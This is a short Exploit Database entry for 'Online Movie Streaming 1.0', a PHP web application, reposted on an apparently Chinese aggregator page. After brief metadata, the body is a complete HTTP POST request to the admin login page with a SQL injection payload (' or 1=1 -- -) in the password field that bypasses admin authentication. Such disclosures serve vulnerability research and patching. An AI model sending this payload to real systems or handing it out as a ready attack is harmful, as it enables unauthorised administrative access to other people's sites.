Online Movie Streaming 1.0 – Admin Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： Richard Jones
  日期： 2021-01-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49421/

• # Exploit Title: Online Movie Streaming 1.0 - Admin Authentication Bypass
  # Exploit Author: Richard Jones
  # Date: 2021-01-13
  # Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
  # Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
  # Version: 1.0
  # Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
  
  #Exploit URL: http://TARGET/onlinemovies/Plogin.php
   POST /onlinemovies/Plogin.php HTTP/1.1
   Host: TARGET
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 48
   Origin: http://TARGET
   Connection: close
   Cookie: PHPSESSID=p09pmo49cb8dr0s75r1jhttlvj
   Upgrade-Insecure-Requests: 1
  
   mail=admin%40a.com&pass=ad`'+or+1=1+--+-a&login=